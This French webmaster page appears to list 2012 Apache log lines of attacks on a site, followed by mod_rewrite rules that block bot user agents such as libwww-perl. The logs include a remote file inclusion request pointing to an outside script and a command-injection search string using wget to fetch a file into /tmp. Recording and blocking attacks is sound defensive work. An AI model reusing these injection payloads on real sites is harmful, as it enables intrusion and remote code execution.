Liste des scripts connus et des dernières attaques :



130.215.29.119 - - [30/Jan/2012:02:46:58 +0100] "GET /ttt.txt HTTP/1.1" 404 322 "-" "libwww-perl/5.834"
91.121.76.251 - - [31/Jan/2012:00:30:01 +0100] "GET /ovh.txt HTTP/1.1" 200 3 "-" "OVH Service Monitoring"
91.121.76.251 - - [31/Jan/2012:08:30:04 +0100] "GET /ovh.txt HTTP/1.1" 200 3 "-" "OVH Service Monitoring"
91.121.76.251 - - [31/Jan/2012:16:30:04 +0100] "GET /ovh.txt HTTP/1.1" 200 3 "-" "OVH Service Monitoring"
91.121.76.251 - - [01/Feb/2012:00:30:02 +0100] "GET /ovh.txt HTTP/1.1" 200 3 "-" "OVH Service Monitoring"
91.121.76.251 - - [01/Feb/2012:08:30:01 +0100] "GET /ovh.txt HTTP/1.1" 200 3 "-" "OVH Service Monitoring"
91.121.76.251 - - [02/Feb/2012:00:30:01 +0100] "GET /ovh.txt HTTP/1.1" 200 3 "-" "OVH Service Monitoring"
91.121.76.251 - - [02/Feb/2012:08:30:02 +0100] "GET /ovh.txt HTTP/1.1" 200 3 "-" "OVH Service Monitoring"
91.121.76.251 - - [03/Feb/2012:08:30:01 +0100] "GET /ovh.txt HTTP/1.1" 200 3 "-" "OVH Service Monitoring"
91.121.76.251 - - [03/Feb/2012:16:30:01 +0100] "GET /ovh.txt HTTP/1.1" 200 3 "-" "OVH Service Monitoring"
91.121.76.251 - - [04/Feb/2012:00:30:01 +0100] "GET /ovh.txt HTTP/1.1" 200 3 "-" "OVH Service Monitoring"
91.121.76.251 - - [04/Feb/2012:08:30:01 +0100] "GET /ovh.txt HTTP/1.1" 200 3 "-" "OVH Service Monitoring"
[Sun Jan 29 10:12:10 2012] [error] [client 90.57.36.172] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855, referer: http://cod4.placeoweb.com/location.php?l=crediter&noman=1&RECALL=M93387E8&codes=M93387E8&code=M93387E8
[Sun Jan 29 10:12:12 2012] [error] [client 195.158.240.134] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855
[Sun Jan 29 10:40:26 2012] [error] [client 195.132.243.85] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855
[Sat Feb 04 21:49:23 2012] [error] [client 90.43.245.235] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855, referer: http://cod4.placeoweb.com/location
[Sat Feb 04 21:49:26 2012] [error] [client 195.158.240.134] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855
[Sat Feb 04 21:51:11 2012] [error] [client 66.249.66.235] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855
[Sat Feb 04 21:53:36 2012] [error] [client 66.249.66.235] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855
[Sat Feb 04 21:53:38 2012] [error] [client 90.43.245.235] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855, referer: http://cod4.placeoweb.com/location
[Sat Feb 04 21:53:50 2012] [error] [client 90.43.245.235] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855
[Sat Feb 04 21:53:57 2012] [error] [client 90.43.245.235] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855
[Sat Feb 04 21:54:44 2012] [error] [client 90.43.245.235] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855
[Sat Feb 04 21:55:08 2012] [error] [client 90.43.245.235] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855
[Sat Feb 04 22:03:56 2012] [error] [client 82.230.1.99] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855, referer: http://mijaweb.e-monsite.com/pages/call-of-duty-4/louer-server-cod4.html
[Sat Feb 04 22:41:12 2012] [error] [client 66.249.66.235] PHP Warning:  file_get_contents(/var/www/.callofduty4/main/ban.txt): failed to open stream: No such file or directory in /home/var/www/cod4.placeoweb.com/location.php on line 855
[Mon Jan 30 02:46:58 2012] [error] [client 130.215.29.119] File does not exist: /var/www/ttt.txt
201.78.21.145 - - [29/Jan/2012:20:10:37 +0100] "GET /hack/php/liste.php/phphtml.php?htmlclass_path=http://www.hablemosdefutbol.tv/chat/version_.txt?¶=tirrom2020@gmail.com&tempo=999999&checador=http://127.0.0.1/apag13231ador1.php&enviador=http://www.hablemosdefutbol.tv/chat/copying_.txt HTTP/1.1 " 200 30109 "-" "-"
95.128.145.27 - - [03/Feb/2012:09:00:16 +0100] "GET /dotclear/index.php/2006/11/20/46-rsync HTTP/1.0" 200 9346 "http://www.google.com/url?sa=t&rct=j&q=exemple+rsync.exe+-F+--exclude-from%3D%22C%3A%2F+%3C%3C%3C%3C+exclude.txt%22&source=web&cd=1&ved=0CCYQFjAA&url=http%3A%2F%2Fwww.placeoweb.com%2Fdotclear%2Findex.php%2F2006%2F11%2F20%2F46-rsync&ei=BZQrT5LFMIjf8AP0yImGDw&usg=AFQjCNFVXw-mGWzQiitcibCeSDxNg3ln-A" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.26) Gecko/20120128 Ant.com Toolbar 2.0.1 Firefox/3.6.26 GTB7.1"
81.47.192.180 - - [03/Feb/2012:13:21:21 +0100] "GET /hack/php/liste.php HTTP/1.1" 200 5420 "http://www.google.es/url?sa=t&rct=j&q=http%3A%2F%2Fdokeosdev.drecomm.nl%2Fi.txt&source=web&cd=4&ved=0CDkQFjAD&url=http%3A%2F%2Fwww.placeoweb.com%2Fhack%2Fphp%2Fliste.php&ei=MtErT-jvEYyr-QaV27iFDg&usg=AFQjCNH_q9nV1herW3y3JbrF4-WT1dP-fA&cad=rja" "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.25) Gecko/20111212 Firefox/3.6.25 ( .NET CLR 3.5.30729; .NET4.0E)"
81.47.192.180 - - [03/Feb/2012:13:25:53 +0100] "GET /hack/php/liste.php HTTP/1.1" 200 30109 "http://www.google.es/search?q=%22%2F%2Fp_%2Fwebdav%2Fxmltools%2Fminidom%2Fxml%2Fsax%2Fsaxutils%2Fos%2Fpopen2%3Fcmd%3Dwget%2520--output-document%2520%2Ftmp%2Fi.txt%22&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:es-ES:official&client=firefox-a" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0 Paros/3.2.13"




Enregistrement des nouveaux scripts :
http://cod4.placeoweb.com/location.php?l=crediter&noman=1&RECALL=M93387E8&codes=M93387E8&code=M93387E8 OK
http://cod4.placeoweb.com/location OK
http://mijaweb.e-monsite.com/pages/call-of-duty-4/louer-server-cod4.html OK
http://www.hablemosdefutbol.tv/chat/version_.txt?¶=tirrom2020@gmail.com&tempo=999999&checador=http://127.0.0.1/apag13231ador1.php&enviador=http://www.hablemosdefutbol.tv/chat/copying_.txt OK
http://www.google.com/url?sa=t&rct=j&q=exemple+rsync.exe+-F+--exclude-from%3D%22C%3A%2F+%3C%3C%3C%3C+exclude.txt%22&source=web&cd=1&ved=0CCYQFjAA&url=http%3A%2F%2Fwww.placeoweb.com%2Fdotclear%2Findex.php%2F2006%2F11%2F20%2F46-rsync&ei=BZQrT5LFMIjf8AP0yImGDw&usg=AFQjCNFVXw-mGWzQiitcibCeSDxNg3ln-A OK 200
http://www.google.es/url?sa=t&rct=j&q=http%3A%2F%2Fdokeosdev.drecomm.nl%2Fi.txt&source=web&cd=4&ved=0CDkQFjAD&url=http%3A%2F%2Fwww.placeoweb.com%2Fhack%2Fphp%2Fliste.php&ei=MtErT-jvEYyr-QaV27iFDg&usg=AFQjCNH_q9nV1herW3y3JbrF4-WT1dP-fA&cad=rja OK
http://www.google.es/search?q=%22%2F%2Fp_%2Fwebdav%2Fxmltools%2Fminidom%2Fxml%2Fsax%2Fsaxutils%2Fos%2Fpopen2%3Fcmd%3Dwget%2520--output-document%2520%2Ftmp%2Fi.txt%22&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:es-ES:official&client=firefox-a OK

On constate que de nombreuses injections concernent Joomla, on en parle sur Hack de sites joomla : quels composants sont visés ?

Une méthode simple pour bannir de nombreux attaquants est de les rediriger, depuis la configuration globale de votre serveur web, selon leurs paramétres de connexion, tel que l'agent http : HTTP_USER_AGENT

Voici un simple exemple sur Apache pour bloquer tous ceux qui s'identifient comme des navigateurs nommés : libwww-perl/xxx (ex : libwww-perl/5.79)

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww-perl
RewriteRule .*$ http://immobilier.placeoweb.com [R,L]

Si vous souhaitez en bloquer plusieurs :

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} Kapere [OR]
RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} Microsoft\ URL\ Control
RewriteRule .*$ http://perdu.com [R,L]

Vous pouvez noter ces directives Apache, au choix, dans :

• un fichier nommé anti-aspirateurs-hack.conf que vous placerez dans un répertoire inclus par Apache (Include /etc/apache2/sites/)
• un fichier .htaccess à la racine de votre site où via une include dans chaque virtualhost.

Vous trouverez comment bloquer plus de robots et d'aspirateurs sur http://aide.sivit.fr/index.php?2005/07/25/84-bloquer-les-robots

Et pour l'explication des directives Apache concernées, vive la documentation Apache Module mod_rewrite en anglais, sinon une documention plus ancienne en francais.